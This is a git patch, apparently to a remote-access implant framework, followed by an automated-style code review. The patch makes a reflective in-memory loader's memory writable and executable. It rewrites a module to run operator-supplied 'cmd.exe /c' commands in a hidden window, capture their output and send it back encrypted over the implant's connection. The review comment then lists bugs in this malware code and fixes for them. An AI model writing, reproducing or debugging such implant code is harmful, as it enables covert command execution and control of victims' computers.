From 5c7c3dfa76f4957c25397a6559bf4c4dd5da9810 Mon Sep 17 00:00:00 2001
From: APT64
Date: Thu, 21 Sep 2023 20:31:54 +0300
Subject: [PATCH] fix fixed "exec" module && session lock

---
 .../ClSp/bin_files/ClSp_Tcp_Exe/mem_ldr.cpp | 2 +-
 .../ClSp/bin_files/Exec/RegisterModule.cpp | 74 ++++++++++++++++---
 src/main/java/manager/ExternalModules.java | 3 +-
 3 files changed, 65 insertions(+), 14 deletions(-)

diff --git a/modules/ClSp/bin_files/ClSp_Tcp_Exe/mem_ldr.cpp b/modules/ClSp/bin_files/ClSp_Tcp_Exe/mem_ldr.cpp
index 49a678c..c586f33 100644
--- a/modules/ClSp/bin_files/ClSp_Tcp_Exe/mem_ldr.cpp
+++ b/modules/ClSp/bin_files/ClSp_Tcp_Exe/mem_ldr.cpp
@@ -137,7 +137,7 @@ PULONG _LoadLibrary(char* payload) {
 {
 if (reloc_table) {
 if (__reloc_fix(image_base, (BYTE*)pref_base_addr, reloc_table)) {
- VirtualProtect(sectionAddr, sectionMemSize, PAGE_EXECUTE_READ, &old);
+ VirtualProtect(sectionAddr, sectionMemSize, PAGE_EXECUTE_READWRITE, &old);
 return (PULONG)sectionAddr;
 }
 }
diff --git a/modules/ClSp/bin_files/Exec/RegisterModule.cpp b/modules/ClSp/bin_files/Exec/RegisterModule.cpp
index 475c083..9a3c434 100644
--- a/modules/ClSp/bin_files/Exec/RegisterModule.cpp
+++ b/modules/ClSp/bin_files/Exec/RegisterModule.cpp
@@ -3,24 +3,76 @@ #include #include -std::string command_execute(const char* cmd) { - char line[256]; +HANDLE g_hChildStd_OUT_Rd = NULL; +HANDLE g_hChildStd_OUT_Wr = NULL; + +HANDLE g_hInputFile = NULL; + +void CreateChildProcess(std::string szCmdline); +std::string ReadFromPipe(); + +std::string command_execute(std::string cmd) +{ + SECURITY_ATTRIBUTES saAttr; + saAttr.nLength = sizeof(SECURITY_ATTRIBUTES); + saAttr.bInheritHandle = TRUE; + saAttr.lpSecurityDescriptor = NULL; + + CreatePipe(&g_hChildStd_OUT_Rd, &g_hChildStd_OUT_Wr, &saAttr, 0); + SetHandleInformation(g_hChildStd_OUT_Rd, HANDLE_FLAG_INHERIT, 0); + CreateChildProcess(cmd); + + return ReadFromPipe(); +} + +void CreateChildProcess(std::string szCmdline) +{ + PROCESS_INFORMATION piProcInfo; + STARTUPINFO siStartInfo; + ZeroMemory(&piProcInfo, sizeof(PROCESS_INFORMATION)); + + + ZeroMemory(&siStartInfo, sizeof(STARTUPINFO)); + siStartInfo.cb = sizeof(STARTUPINFO); + siStartInfo.hStdError = g_hChildStd_OUT_Wr; + siStartInfo.hStdOutput = g_hChildStd_OUT_Wr; + siStartInfo.dwFlags |= STARTF_USESTDHANDLES; + + CreateProcessA(NULL, + (LPSTR)szCmdline.c_str(), + NULL, + NULL, + TRUE, + CREATE_NO_WINDOW, + NULL, + NULL, + (LPSTARTUPINFOA)&siStartInfo, + &piProcInfo); + + CloseHandle(piProcInfo.hProcess); + CloseHandle(piProcInfo.hThread); + + CloseHandle(g_hChildStd_OUT_Wr); + +} + +std::string ReadFromPipe() +{ + DWORD dwRead; + CHAR chBuf[4096]; + HANDLE hParentStdOut = GetStdHandle(STD_OUTPUT_HANDLE); std::string buffer; - FILE* pPipe; - if ((pPipe = _popen(cmd, "r")) == NULL) - { - return 0; - } - while (fgets(line, 256, pPipe)) - { - buffer += line; + + while (ReadFile(g_hChildStd_OUT_Rd, chBuf, sizeof(chBuf), &dwRead, NULL)) { + chBuf[dwRead] = 0; + buffer += chBuf; } return buffer; } extern "C" __declspec(dllexport) ULONG ModuleEntrypoint(MODULE_CONTEXT ctx) { OUTPUT response = { 0 }; - std::string _stdout = command_execute(ctx.argv.at(0).c_str()); + std::string _stdout = command_execute("cmd.exe /c " + 
ctx.argv.at(0)); response.output_length = _stdout.length(); memcpy(response.output, _stdout.data(), _stdout.length()); ctx.send_encrypted(ctx.aes_key, ctx.iv_key, ctx.connection, (char*)&response, sizeof(response)); diff --git a/src/main/java/manager/ExternalModules.java b/src/main/java/manager/ExternalModules.java index 8de315b..3ed4820 100644 --- a/src/main/java/manager/ExternalModules.java +++ b/src/main/java/manager/ExternalModules.java @@ -21,8 +21,7 @@ public void processCommand(String args[]) { for (CommonModule module : GlobalVariables.commonModuleList){ //iterate loaded modules for (int j = 0; j < module.getCmdCount(); j++){ //iterate commands - if (commandName.equalsIgnoreCase(module.getCmd(j).CommandName)){ - + if (commandName.equalsIgnoreCase(module.getCmd(j).CommandName) && (module.getCmd(j).Dependency.equals("default") || module.getCmd(j).Dependency.equals("*"))){ if (args.length-1 != module.getCmd(j).getArgCount()){ currentConsole.printError("You provided " + (args.length-1) + " arguments, but only " + module.getCmd(j).getArgCount() +" were expected!\n"); return;
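Review bot: `chBuf[dwRead] = 0;` in ReadFromPipe writes one byte past the end of `CHAR chBuf[4096]` whenever ReadFile fills the whole buffer, because the read length is `sizeof(chBuf)` and leaves no room for the terminator, and the `buffer += chBuf` that follows truncates a chunk at the first NUL byte the child emits. Both go away by dropping the terminator store and appending by length: `buffer.append(chBuf, dwRead);`. The read end `g_hChildStd_OUT_Rd` is never closed after the loop ends, so every call leaks a handle, `g_hInputFile` is declared but unused, and the return values of CreatePipe and CreateProcessA are not checked, so a failed launch silently yields an empty string where the replaced _popen path at least returned early. Because the pipe ends are file-scope globals, command_execute is not safe to call concurrently; the subject line mentions a session lock, but nothing in this hunk serializes access, so presumably that lives on the Java side. ModuleEntrypoint continues past the end of the hunk.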